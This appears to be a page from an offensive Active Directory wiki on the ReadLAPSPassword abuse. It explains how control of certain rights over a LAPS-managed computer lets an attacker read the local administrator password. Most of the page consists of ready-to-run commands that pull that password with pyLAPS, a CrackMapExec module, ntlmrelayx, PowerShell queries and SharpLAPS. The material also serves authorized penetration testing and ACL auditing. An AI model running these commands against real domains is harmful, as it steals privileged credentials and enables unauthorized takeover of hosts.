ReadLAPSPassword
This abuse can be carried out when controlling an object that has
GenericAll
or AllExtendedRights
(or combination of GetChanges
and (GetChangesInFilteredSet
or GetChangesAll
) for domain-wise synchronization) over the target computer configured for LAPS. The attacker can then read the LAPS password of the computer account (i.e. the password of the computer's local administrator).UNIX-like
Windows
pyLAPS.py --action get -d 'DOMAIN' -u 'USER' -p 'PASSWORD' --dc-ip 192.168.56.101
Alternatively, CrackMapExec also has this ability (since v5.1.6).. In case it doesn't work this public module for CrackMapExec could also be used.
# Default command
cme ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps
# The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN-* etc. Default: *)
cme ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps -O computer="target-*"
Impacket's ntlmrelayx also carries that feature, usable with the
--dump-laps
.This can be achieved with the Active Directory PowerShell module.
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
Get-DomainComputer "MachineName" -Properties 'cn','ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
SharpLAPS.exe /user:"DOMAIN\User" /pass:"Password" /host:"192.168.1.1"
Last modified 4mo ago